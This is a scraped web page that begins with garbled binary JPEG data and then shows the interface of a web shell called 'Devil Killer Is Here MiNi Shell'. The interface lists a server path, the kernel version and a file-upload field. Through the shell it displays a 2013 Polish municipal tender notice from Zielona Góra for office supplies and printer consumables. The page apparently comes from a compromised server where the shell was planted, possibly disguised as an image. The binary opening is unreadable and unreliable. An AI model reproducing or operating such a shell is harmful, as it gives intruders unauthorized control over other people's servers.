JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130121/11297-N-2013.html

<p class="kh_header"><b>Zielona Góra: Dostawa materiałów biurowych, tonerów, tuszy</b><br>
<b>Numer ogłoszenia: 11297 - 2013; data zamieszczenia: 21.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej i Mieszkaniowej , Aleja Zjednoczenia 110, 65-005 Zielona Góra, woj. lubuskie, tel. (068) 322-91-86, faks (068) 322-91-84.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgkim.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych, tonerów, tuszy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1
Zakres zamówienia obejmuje sukcesywną dostawę do siedziby Zamawiającego oraz do komórek organizacyjnych znajdujących się przy ul.  Jedności 65, ul.Pl. Matejki 3d, ul. Sowińskiego 44a ul. Waryńskiego 2, ul.Wrocławska 73 w  terminie 24 godzin od otrzymania informacji o koniecznej dostawie określonego asortymentu - transportem wykonawcy i na koszt wykonawcy materiałów biurowych - zgodnie z poniższym orientacyjnym zestawieniem.                                                                                                                                                 Przy czym zamawiający informuje, iż zakres zamawianego asortymentu może ulec zmianie do 10% wartości zamówienia. Z tego tytułu wykonawcy nie będą przysługiwały żadne roszczenia.                                                                                          Zestawienie towaru:
-BLOK BIUROWY A4 100 KARTEK	-115	szt
-BLOK BIUROWY A5 100 KARTEK 	-120	szt
-BRULION A4  96 KRATA  	-50	szt
-BRULION A5 96 KRATA	-20	szt
-CIENKOPIS Z FIBROWĄ KOŃCÓWKĄ PISZĄCĄ, OPRAWIONĄ W METAL O GRUBOŚCI 0,4 MM, TUSZ NA BAZIE WODY, WENTYLOWANA SKUWKA, RÓŻNE KOLORY	-170	szt
-PIÓRO KULKOWE Z WYMIENNYM WKŁADEM, TUSZ ODPORNY NA WARUNKI ATMOSFERYCZNE, WYKONANY W MIN. 80% Z MATERIAŁÓW PRZETWORZONYCH, GRUBOŚC LINI PISANIA 0,35MM, DŁUGOŚC LINI PISANIA 600M, RÓŻNE KOLORY	-320	szt
DŁUGOPIS NA SPRĘŻYNCE PRZYKLEJANY DO BIURKA 	-20	szt
-DŁUGOPIS Z WYMIENNYM WKŁADEM OLEJOWYM, WODOODPORNYM I NIEBLAKNĄCYM, GUMOWY UCHWYT , PISZE PO KAŻDYM PAPIERZE,GRUBOŚĆ LINII PISANIA 0,27 MM , DŁUGOŚĆ LINI PISANIA 900M, RÓŻNE KOLORY	-200	szt
-DŁUGOPIS OLEJOWY  AUTOMATYCZNY PLASTIKOWA OBUDOWA Z NADRUKIEM W GWIAZDKI	-20	szt
 	-DŁUGOPIS OLEJOWY  PLASTIKOWA OBUDOWA Z NADRUKIEM W GWIAZDKI	-20	 
-DŁUGOPIS OLEJOWY ZWYKŁY	-400	szt
-DŁUGOPIS OLEJOWY, AUTOMATYCZNIE CHOWANY WKŁAD, GUMOWY UCHWYT, WKŁAD WYMIENNY, GRUBOŚĆ LINI PISANIA 0,3MM, ŚREDNICA KULKI PISZĄCEJ 0,7 MM	-350	szt
-DRUK DOWÓD DOSTAWY A6/100 SZT	-270	bl
-DRUK EWIDENCJA CZASU PRAC ROCZ A5/100SZT. W BLOCZKU	-6	opk
-DRUK EWIDENCJA WYJŚĆ W GODZ. SŁUŻBOWYCH A4/100SZT 	-10	bl
-DRUK EWIDENCJA WYPOSAŻENIA A5/SZT KARTON	-65	szt
-DRUK KP A6/100 -160	bl
-DRUK  KSIĄŻKA DRUKÓW ŚCISŁEGO ZARACHOWANIA P-23	-28	szt
-DRUK KARTA MAGAZYNOWA A5/100SZT	-35	bl
-DRUK RAPORT KASOWY A4/100 SZT K-7	-5	bl
-DRUK KSIĄŻKA POCZTOWA A5 	-32	szt
-DRUK ROZLICZENIE ZALICZKI A6 100 SZT	-6	bl
-DRUK MW 80 SZT	22	-bl
-DRUK KW A6/100 SZT	-55	bl
-DRUK MM A5/100 SZT	-55	bl
-DRUK POLECENIE PRZELEWU A6 1+1/100 SZT	-5	bl
-DRUK RAPORT DZIENNY PRAC SPRZĘTU A5/100 SZT	-25	bl
-DRUK WYWIESZKA MAGAZYNOWA KARTON A6/100 SZT	-40	bl
-DRUK ZW 1/3 A4  6 POZYCYJNY 	-65	bl
-DRUK KARTA PRZEBIEGU ZATRUDNIENIA A4	-850	szt
-DZIURACZ WYKONANY Z METALU Z ANTYPOŚLIZGOWĄ PODSTAWĄ NIERYSUJĄCA MEBLI, DZIURKUJE DO 30 KARTEK JEDNORAZOWO, PRESYZYJNY OGRANICZNIK FORMATU Z OKIENKIEM DO JEGO PODGLĄDU, 10 LAT GWARANCJI	-15	szt
-ETYKIETY SAMOPRZYLEPNE 210X297    100 AKUSZY W OPAKOWANIU	-3	opk
-ETYKIETY SAMOPRZYLEPNE  70X37  100 ARKUSZY W OPAKOWANIU	-10	opk
-ETYKIETY DO SEGREGATORA 7CM SAMOPRZYLEPNE	-20	opk
-FASTYKUŁA A4 KPL Z TAŚMĄ	-1000	kpl
-FOLIOPIS  LINIA PISANIA 1,0	-16	szt
-GUMKA DO MAZANIA BIAŁA 	-90	szt
-KALKULATOR 10 POZYCYJNY , POCHYLONY WYŚWIETLACZ, KLAWISZ COFANIA, PODWÓJNEGO ZERA, PODWÓJNE ZASILANIE, FUNKCJA CHECK&CORRECT, WYMIARY 135X143X27	-10	szt
-KALKULATOR 12 POZYCYJNY, PODWÓJNA PAMIĘĆ, ZAIKRĄGLANIE WYNUKÓW, OBLICZANIE MARŻY, KLAWISZ COFANIA, PODWÓJNEGO ZERA, PODWÓJNE ZASILANIE, WYMIARY 154X152X28,5	-10	szt
-KLEJ W SZTYFCIE 15G	-120	szt
-KLIPS 19MM/12 SZT	-190	opk
-KLIPS 32MM/12 	-150	opk
-KLIPS 51MM/12 	-50	opk
-KOPERTA BIAŁA B4/50  HK	-30	opk
-KOPERTA BIAŁA B5/50  SK	-30	opk
-KOPERTA BIAŁA C5/50  SK	-20	opk
-KOPERTA BIAŁA C4/50  SK	-12	opk
-KOPERTA BIAŁA C6/1000 OKNO PRAWE SK-	6	opk
-KOPERTA BIAŁA C6/1000 SK	-20	opk
-KOPERTA BIAŁA C6/50 SK	-40	opk
-KOPERTA BIAŁA DL/1000 OKNO PRAWE SK	-130	opk
-KOPERTA RBD BIAŁA B4/10 SZT. HK	-15	opk
-KOPERTA BIAŁA DL/50  SK	-20	opk
-KOREKTOR W PŁYNIE 	-40	szt
-KOREKTOR W TAŚMIE Z WYMIENNYM WKŁADEM, SZEROŚĆ 4,2MM DŁUGOŚĆ 6M, WYKONANY Z MATERIAŁÓW PRZETWORZONYCH	-150	szt
-KOREKTOR WKŁAD PILOT	-230	szt
-KSIĄŻKA KORESP. 96K BARBARA	-52	szt
-LINIJKA 20CM  	-22	szt
-LINIJKA 30CM 	-10	szt
-MAZAK CD GRUBOŚĆ 1.0 CZARNY	-32	szt
-MAZAK DO ZNAKOWANIA BIELIZNY ALUMINIOWA OBUDOWA, LINIA PISANIA 1 MM, OKRĄGŁA KOŃCÓWKA	-10	szt
-MARKER PERMANENTNY , WODOODPORNY, NIE BLAKNIE POD WPŁYWEM SŁOŃCA, W ALUMINIOWEJ OBUDOWIE, ODPORNY NA WYSYCHANIE, WYTRZYMAŁA KOŃCÓWKA WYKONANA Z FIBRY, MOŻLIWOŚĆ WIELOKROTNEGO NAPEŁNIANIA TUSZEM, NIE ZAWIERA KSYLENU OKRAGŁA KOŃCÓWKA , LINIA PISANIA 1 MM DŁUGOŚĆ LINI PISANIA 900M 	-120	szt
-NOTES KOST BIAŁA  KLEJONA  	-130	szt
-NOTES SAMOPRZYLEPNY 76X76   ŻÓŁTY	-400	szt
-ZAKŁADKI INDEKSUJĄCE SAMOPRZYLEPNE ROZMIAR 4X20X50 	-210	opk
-NOŻYCZKI 16 Z MIĘKKA RĄCZKĄ	-10	szt
-NOŻYCZKI 17  Z MIĘKKĄ RĄCZKĄ	-15	szt
-OBWOLUTA  A4/100 SZT GROSZKOWA	-120	opk
-OBWOLUTA A5/100 SZT GROSZKOWA	-30	opk
-OBWOLUTA  Z KLAPKA A4/10 SZT	-140	opk
-OŁÓWEK	-130	szt
-PAPIER DO FAXU 210/30 	-10	szt
-PAP KOM 240X12 1 WARSTWA-	10	kar
-PAP KOM 240X12 2  WARSTWA-	15	kar
-PAP KOM 240X12 2 WARSTWY Z  NADRUKIEM	-10	szt
-PAP KOM 240X12 3 WARSTWY	-5	kar
-PAP KOM 360X12 1  WARSTWA-15	szt
-PAPIER KSERO A3 BIAŁY 80 GRAM BIAŁOŚĆ CIE MINIMUM 165 	-20	ryza
-PAPIER KSERO A4 BIAŁY 80 GRAM BIAŁOŚĆ CIE MINIMUM 165 	-3200	ryza
-PASEK SKOROSZYTOWY PLASTKOWY 25 SZT W OPAKOWANIU	-10	szt
-PIÓRO KULKOWE ZE SPECJALNYM DOZOWNIKIEM PRZEPŁYWU ATRAMENTU, PISZE NIEPRZERWANIE DO OSTATNIEJ KROPLI. ERGONOMICZNY GUMOWY UCHWUT, GŁOWICA PISZĄCA ZE STALI NIERDZEWNEJ, KULKA WYKONANA ZE STOPU WOLFRAMU I WEGLIKA, WENTYLOWANA SKUWKA Z KLIPEM, DŁUGOŚC LINI PISANIA 1400M, LINIA PISANIA 0,3 MM.	-90	szt
-PIÓRO KULKOWE AUTOMATYCZNE, TUSZ PIGMENTOWY, WODOODPORNY, ZASYCHA W CIĄGU 1 SEKUNDY, PISZE PO ŚLISKIM PAPIERZE, NIE PRZESIĄKA PRZEZ PAPIER,WYMIENNY WKŁAD.	-20	szt
-PIÓRO ŻELOWE AUTOMATYCZNE	-70	szt
-PISAKI 12 KOLORÓW W OPAKOWANIU-	5	opk
-PŁYTA CD W PLASTKOWYM OPAKOWANIU	-80	szt
-PŁYTA DVD W PLASTKOWYM OPAKOWANIU	-150	szt
-PODKŁAD DO PISANIA PCV A4 	-5	szt
-PODKŁAD NA BIURKO SKÓROPODOBNY Z PRZYBORNIKIEM I WYPOSAŻENIEM 	-10	szt
-PODKŁAD DO PISANIA PCV A4 Z OKŁADKĄ -	20	szt
-CHUSTECZKI NASĄCZONE DO CZYSZCZENIA EKRANU LCD-	35	szt
-SPRĘŻONE POWIETRZE DO CZYSZCZENIA SPRZĘTU KOMPUTEROWEGO	-5	szt
-PRZEKŁADKI  KARTONOWE KOLOR PRZEKŁDAKI ODPOWIADA KOLOROWI INDEKSU, WYKONANE Z KARTONU 170G/M2 UZYSKANE W DRODZE RECYKLINGU, POSIADAJĄ KARTĘ OPISOWĄ ORAZ PERFORACJĘ A4 12 STRON	-90	opk
-PRZEKŁADKI KARTONOWE A4 Z KOLOROWYMI INDEKSAMI WZMOCNIONYMI FOLIĄ MYLAR 1-12	-65	opk
-PRZEKŁADKI KARTONOWE A4 Z KOLOROWYMI INDEKSAMI WZMOCNIONYMI FOLIĄ MYLAR 1-31	-15	opk
-PRZEKŁADAKI WĄSKIE KARTONOWE OP.100 SZT. KOLOROWE-	10	opk
-ROLKI OFSETOWE 57/10-30M	-20	opk
-ROZSZYWACZ 	-10	szt
-PINEZKI SREBRNE 50SZT. OPAKOWANIE	-6	opk
-SEGREGATOR OKLEINOWANY JEDNOSTRONNIE POLIPROPYLENEM, KOLOROWY, SZEROKOŚC 50 MM, MECHANIZM DŹWIGNIOWY METALOWY, ZMOCNIONY OTWÓR NA PALEC, METALOWA LISTWA NA DOLE ZAPOBIEGAJACA ROZWARTWIANIU SEGREGATORA, WYMIENNA ETYKIETA OPISOWA	-280	szt
-SEGREGATOR OKLEINOWANY JEDNOSTRONNIE POLIPROPYLENEM, KOLOROWY, SZEROKOŚC 70 MM, MECHANIZM DŹWIGNIOWY METALOWY, ZMOCNIONY OTWÓR NA PALEC, METALOWA LISTWA NA DOLE ZAPOBIEGAJACA ROZWARTWIANIU SEGREGATORA, WYMIENNA ETYKIETA OPISOWA	-650	szt
-SKOROSZYT BIAŁY A4 KARTONIOWY	-390	szt
-SKOROSZYT OCZKOWY 1/1 BIAŁY-2200	szt
-SKOROSZYT OCZKOWY 1/2 BIAŁY	-600	szt
-SKOROSZYT POLIPROPYLENOWY-	400	szt
-SKOROSZYT ZAWIESZANY PCV- 	500	szt
-SKOROSZYT PCV	-20	szt
 -SKOROSZYT POLIPROPYLENOWY ZAWIESZANY-	550	szt
-SKOROSZYT ZAWIESZANY 1/1 BIAŁY	-220	szt
-SKOROSZYT ZAWIESZANY 1/2 BIAŁY-	50	szt
-SKOROWIDZ A4  96 KARTEK-	5	szt
-SPINACZE 28/100 OKRĄGŁE	-350	opk
-SPINACZE 50/100 OKRĄGŁE	-70	opk
-TACKA NA DOKUMENTY A4 PLASTIKOWA -	40	szt
-TAŚMA BIUROWA 18X20M	-250	szt
-TAŚMA ARCHIWIZACYJNA DŁUGOŚC NA ZWOJU 100M BAWEŁNA 	-25	szt
-TAŚMA PAKOWA  BRĄZ AKRYL-	35	szt
-TECZKA DO PODPISU  10 KARTEK-	30	szt
-TECZKA WIĄZANA BIAŁA A4	-750	szt
-TECZKA Z GUMKĄ BIAŁA  A4	-230	szt
-TECZKA Z GUMKĄ Z PRESZPANU, GUMKA NAROŻNIKOWA W KOLORZE CZARNYM, TEKTURA 380 GRAM	-300	szt
-TECZKA Z GUMKĄ JEDNOSTRONNIE BARWIONA, LAKIEROWANA, TEKTURA 400 GRAM	-220	szt
-TECZKA Z RZEPEM SKRZYDŁOWA KOLOROWA	-25	szt
-TEMPERÓWKA METALOWA POJEDYŃCZA	-30	szt
-TUSZ DO STĘPLI CZARNY	-20	szt
-TUSZ DO STĘPLI CZERWONY-	5	szt
-TUSZ DO STĘPLI METALOWYCH	-5	szt
-WKŁAD DO DŁUGOPISU POPULARNEGO-	50	szt
-WKŁAD DO DŁUGOPISU Z POZYCJI 8 CZARNY (SN 100,101)	-10	szt
-WKŁAD DO DŁUGOPISU Z POZYCJI 8 CZERWONY (SN 100,101)	-5	szt
-WKŁAD DO DŁUGOPISU Z POZYCJI 8 NIEBIESKI (SN 100,101)-	200	szt
-WKŁAD DO PIÓRA Z POZYCJI 87 NIEBIESKIE, CZARNE	-10	szt
-WKŁAD ŻELOWY AUT CZARNY	-5	szt
-WKŁAD ŻELOWY AUT  CZERWONY	-30	szt
-WKŁAD ŻELOWY AUT NIEBIESKI-	100	szt
-WKŁAD ŻELOWY PILOT G-2 NIEBIESKI-	10	szt
-ZAKREŚLACZ RÓŻNE KOLORY-	280	szt
-ZESZYT 16 KRATA-	15	szt
-ZESZYT 32 KRATA 	-25	szt
-ZESZYT 60 KRATA	-20	szt
 -BRULION A4  96 KRATA - 	5	szt
-ZESZYT A4  96 KRATA 	-5	szt
-ZSZYWACZ WYKONANY Z TRWAŁEGO PLASTIKU , OBROTOWA KOŃCÓWKA, TRZY SPOSOBY ZSZYWANIA, ZSZYWA DO 30 KARTEK JEDNORAZOWO, NA ZSZYWKI 24/6 I 26/6, GŁĘBOKOŚC WSUWANIA KARTKI 65MM, GWARANCJA MINIMUM 5 LAT	-60	szt
-ZSZYWKI 10 	-110	opk
-ZSZYWKI 24/6  	-280	opk
-ZWILŻACZ ŻELOWY DO PALCÓW 20ML 	-15	szt

            3.3. Zadanie 2   
Zamówienie obejmuje sukcesywną dostawę do siedziby Zamawiającego, transportem wykonawcy i na koszt Wykonawcy tonerów do drukarek laserowych i faksów, taśm barwiących, taśm magnetycznych, głowic barwiących do maszyn drukujących według niżej podanego zestawienia, lub materiałów równoważnych.            

Zestawienie towaru:
-Taśma OKI 320-	205 szt
-CANON PGI-5 BK-	2 szt
-CANON PGI-520 BK-	11szt
-CANON K CLI-521 CYAN	-7szt
-CANON K CLI-521 MAGENTA	-7szt
-CANON K CLI-521 YELLOW	-7szt
-CANON K CLI-8C CYAN	-2szt
-CANON K CLI-8M MAGENTA	-2szt
-CANON K CLI-8Y YELLOW	-2szt
 -HP 51645A 45 BK	-2szt
-HP C4844A 10 BK	-3szt
-HP C4906A 940XL BK	-9szt
-HP C6656A 56 BK	-2szt
-HP C8765E 338 BK	-2szt
-HP K C4836A 11CYAN	-3szt
-HP K C4838A 11 YELLOW	-2szt
-HP K C4837A 11 MAGENTA	-2szt
-HP K C4907A 940XL CYAN	-7szt
-HP K C4908A 940HL MAGENTA	-7szt
-HP K C4909A 940XL YELLOW	-7szt
-HP K C6657A 57	-2szt
-HP K C8766E 343	-5szt
-HP L C3906A BK 5L/6L	-2szt
-HP L C4092A BK 1100/3200	-15szt
-HP L C7115A BK 1200	-11szt
-HP L CB436A BK P1505	-5szt
-HP L CC530A BK	-5szt
-HP L CC531A CYAN-	2szt
-HP L CC532A YELLOW	-3szt
-HP L CC533A MAGENTA	-2szt
-HP L CE255A BK	-60szt
-HP L CE278A BK	-3szt
-HP L CE285A BK	-8szt
-HP L CE505A BK	-8szt
-HP L Q2610A BK 2300	-10szt
-HP L Q2612A BK 1010	-2szt
-HP L Q2613A BK 1300	-11szt
-HP L Q5942A BK 4250	-2szt
-HP L Q5949A BK 1160/1320	-53szt
-HP L Q7551A BK 3005	-9szt
-HP L Q7553A BK 2015	-15szt
-LEXMARK E120	-8szt
-SAMSUNG SCX-4521D3	-4szt
-CANON CL-513 MP240/260 3-KOLORY	-2szt
-CANON PG-512 BK MP240/260/480	-2szt
-CANON PGI-520 BK IP3600/4600/MP620	-8szt
-HP-C4902AE (940) BLACK	-2szt
-TAŚMA DO STRIMERA HP C5709A	-35szt
-TONER KONICA MI 102B	-2szt
-TONER KONICA MI 103B	-6szt
-TONER KONICA MI 204B	-2szt
-TONER KONICA MI 302B	-2szt
-TONER KONICA MI TN-303K	-2szt
-TONER LEX E 120 BĘBEN	-1szt
-TONER PANA KX-FA 83E	-1szt
-TONER PHILIPS PFA741	-2szt
-TONER SHARP AR-202T	-5szt
-TONER SHARP MX206 GT	-3szt
-TONER SHARP MX312GT	-4szt
-TONER TOSHIBA T-3520E	-4szt
-TONER XEROX 6125 BK	-14szt
-TONER XEROX 6125 CYAN	-5szt
-TONER XEROX 6125 MAGENTA	-4szt
-TONER XEROX 6125 YELLOW	-4szt
-FOLIA PANASONIC 52	-3szt
-FOLIA PANASONIC 57X	-1szt


- Zobowiązuje się Wykonawcę do dostarczenia w/w materiałów swoim transportem i na własny koszt do siedziby Zamawiającego w terminie 24 godzin od złożenia zamówienia w formie pisemnej, faxem lub telefonicznie.
- W przypadku stwierdzenia wad dostarczonego towaru Wykonawca zobowiązuje się do jego wymiany na swój koszt w terminie 48 godzin.
- Zamawiający dopuszcza zaoferowanie materiałów eksploatacyjnych równoważnych (tzw. zamienniki). Przez równoważne Zamawiający rozumie produkty w pełni kompatybilne z urządzeniami w których mają być użytkowane jako materiały eksploatacyjne, oraz posiadające nie gorsze niż produkty oryginalne parametry w zakresie wydajności, niezawodności oraz jakości. Zamontowanie i używanie materiałów eksploatacyjnych równoważnych nie może powodować utraty gwarancji producenta drukarki. 
- Oferowane materiały eksploatacyjne równoważne muszą być wytwarzane pod nadzorem zintegrowanego systemu zarządzania jakością, środowiskiem oraz BHP w zakresie projektowania, produkcji i dystrybucji komputerowych materiałów eksploatacyjnych zgodnych z wymogami norm ISO 9001:2008 w zakresie projektowania i produkcji biurowych materiałów eksploatacyjnych, 14001:2004 oraz PN-N 18001:2004 lub równoważnymi normami zharmonizowanymi światowymi/europejskimi. 
W celu potwierdzenia spełnienia powyższego wymogu Zamawiający żąda dołączenia do oferty certyfikatów ISO 9001, ISO 14001 oraz PN-N 18001 lub równoważnymi normami zharmonizowanymi światowymi/europejskimi. 
- Oferowane produkty muszą być fabrycznie nowe, tj. wykonane z nowych elementów lub pełnowartościowych komponentów z odzysku bez śladów użytkowania, które przed końcowym zmontowaniem gotowego wyrobu przeszły testy wykluczające wady materiałowe (nieszczelności, mikropęknięcia), w oryginalnych opakowaniach producenta z widocznym  logo i symbolem produktu, posiadające wszelkie zabezpieczenia szczelności zbiorników z tonerem odpowiednie do uszczelnień stosowanych prze producentów urządzeń, posiadające wymienione na nowe wszystkie komponenty wpływające bezpośrednio na jakość wydruku (w tym wałek optyczny) i gwarantujące bezpieczeństwo użytkowania.
 - W celu potwierdzenia, że podstawowe parametry produktów równoważnych (wydajność, kompatybilność) są równe lub przekraczają parametry odpowiadających im produktów oryginalnych, Zamawiający żąda dołączenia do oferty specyfikacji parametrów technicznych  (wydajność, kompatybilność, gwarancja) dla każdego zaoferowanego produktu oraz raportów z testów wydajnościowych oferowanych produktów, w których producent potwierdza wskazane parametry.
 - Zamawiający wymaga, aby testy wydajności prowadzone były zgodnie z międzynarodowymi normami, tj. ISO 19752:2004 i ISO 19798:2006 (dla kaset z tonerem do drukarek monochromatycznych i kolorowych), ISO 24711:2006  (dla kartridży atramentowych). Raporty powinny być sporządzone w języku polskim oraz powinny zawierać wszystkie informacje wymagane przez wskazane normy.
- Zamawiający wymaga, aby produkty równoważne objęte były dożywotnią gwarancją  (bez limitu czasu i stopnia zużycia, trwającą do momentu wyczerpania ładunku barwiącego).
- Oferowane równoważne materiały eksploatacyjne nie mogą powodować ograniczeń funkcji i możliwości sprzętu oraz zaniżać jakości wydruku w stosunku do materiałów oryginalnych. Wymagana jest również pełna kompatybilność z oprogramowaniem sprzętu: informowanie o liczbie wydrukowanych stron, poziomie zużycia tonera, tuszu, głowicy - jeśli sprzęt posiada takie możliwości. W przypadku, kiedy produkt oryginalny posiada wbudowany układ scalony, który monitoruje proces druku, produkt równoważny winien posiadać analogiczny element działający w ten sam sposób. Zamawiający zastrzega sobie prawo sprawdzenia oryginalności przedłożonych testów wydajności.
- W przypadku awarii urządzenia drukującego, której przyczyną będzie użycie materiału eksploatacyjnego równoważnego(zgodnie z ofertą Wykonawcy) Wykonawca zobowiązuje się do naprawy lub dokona wymiany sprzętu na nowy na swój koszt. Naprawa odbędzie się w autoryzowanym serwisie i nie będzie powodować utraty dalszej gwarancji. 
- Zakres zamawianego asortymentu może ulec zmianie do 10 % wartości zamówienia, wykonawcy nie będą przysługiwały z tego tytułu żadne roszczenia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.92.00-0, 30.19.21.60-0, 30.19.21.21-5, 30.19.76.44-2, 30.19.92.30-1, 30.19.72.00-8, 30.19.21.30-1, 30.14.12.00-1, 30.19.93.30-2, 30.19.73.00-9, 30.12.51.10-5, 30.19.21.12-9, 30.19.23.00-4, 30.21.60.00-6, 30.23.43.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 14.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
